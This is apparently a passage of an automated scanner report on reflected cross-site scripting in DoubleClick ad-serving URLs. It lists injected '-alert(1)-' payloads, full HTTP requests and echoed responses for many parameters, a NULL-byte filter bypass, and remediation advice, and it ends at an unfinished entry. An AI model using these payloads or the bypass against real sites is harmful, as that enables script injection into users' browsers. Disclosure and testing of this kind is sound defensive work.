<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... r FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT%002096d"-alert(1)-"97b0dfdbd42&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/df/%2a/z%3B234265784%3B1-0%3B0%3B58044025%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs%3D%3fhttp ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d012"-alert(1)-"798e5f4187f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=374868852d012"-alert(1)-"798e5f4187f&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:50:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6678
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 50.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=374868852d012"-alert(1)-"798e5f4187f&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/d%3B234266103%3B2-0%3B0%3B58044025%3B4307-300/250%3B38529139/38546896/ ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2871"-alert(1)-"dd540de812e was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=Gc2871"-alert(1)-"dd540de812e&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6678
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... nar-Analysis_300x250.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=Gc2871"-alert(1)-"dd540de812e&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/250%3B ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0029a66"-alert(1)-"0503257d38a was submitted in the destination parameter. This input was echoed as 29a66"-alert(1)-"0503257d38a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=%0029a66"-alert(1)-"0503257d38a HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6690 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 19:28:15 GMT Expires: Sun, 30 Jan 2011 19:28:15 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... cape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=%0029a66"-alert(1)-"0503257d38ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/df/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PL ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a01ea"-alert(1)-"f73a2c9f20 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=a01ea"-alert(1)-"f73a2c9f20 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6646 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 14:51:02 GMT Expires: Sun, 30 Jan 2011 14:51:02 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=a01ea"-alert(1)-"f73a2c9f20http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/u%3B234266403%3B0-0%3B0%3B58044025%3B4307-300/250%3B38529133/38546890/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PL ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42002"-alert(1)-"c30755c1247 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!42002"-alert(1)-"c30755c1247&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:48:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6510
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Schwab_AI_Q410_Webinar-Analysis_300x250.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!42002"-alert(1)-"c30755c1247&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/n%3B234266403%3B1-0%3B0%3B5804402 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a71d5"-alert(1)-"c72810b521d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334a71d5"-alert(1)-"c72810b521d&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6543
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 0_Webinar-Analysis_300x250.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334a71d5"-alert(1)-"c72810b521d&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/l%3B234280362%3B0-0%3B0%3B58044029%3B4307-300/250 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b51a"-alert(1)-"6a635320be6 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=22476116b51a"-alert(1)-"6a635320be6&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:50:25 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6666
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ar minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=22476116b51a"-alert(1)-"6a635320be6&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/t%3B234282361%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6f6d"-alert(1)-"a0cc74f8d36 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987af6f6d"-alert(1)-"a0cc74f8d36&destination=;ord=2247611? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:50:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6666
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 0" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987af6f6d"-alert(1)-"a0cc74f8d36&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/z%3B234282361%3B2-0%3B0%3B58044029%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect. ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed08d"-alert(1)-"738e3685fea was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSNed08d"-alert(1)-"738e3685fea&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:50:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6685
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSNed08d"-alert(1)-"738e3685fea&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/n%3B234280362%3B1-0%3B0%3B58044029%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs%3D%3fhttp ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 683a3"-alert(1)-"726bafe38a0 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=683a3"-alert(1)-"726bafe38a0&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:50:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6511
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... is_300x250.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=683a3"-alert(1)-"726bafe38a0&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/l%3B234280362%3B0-0%3B0%3B58044029%3B4307-300/250%3B39750646/39768433/2%3 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a076a"-alert(1)-"1cdbc5ea870 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=Ga076a"-alert(1)-"1cdbc5ea870&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6498
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... nar-Analysis_300x250.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=Ga076a"-alert(1)-"1cdbc5ea870&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B385 ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2871e"-alert(1)-"f53a100785a was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=2871e"-alert(1)-"f53a100785a HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6666 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 14:50:57 GMT Expires: Sun, 30 Jan 2011 14:50:57 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=2871e"-alert(1)-"f53a100785ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/t%3B234282361%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PL ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f0b"-alert(1)-"64d1b9420e8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
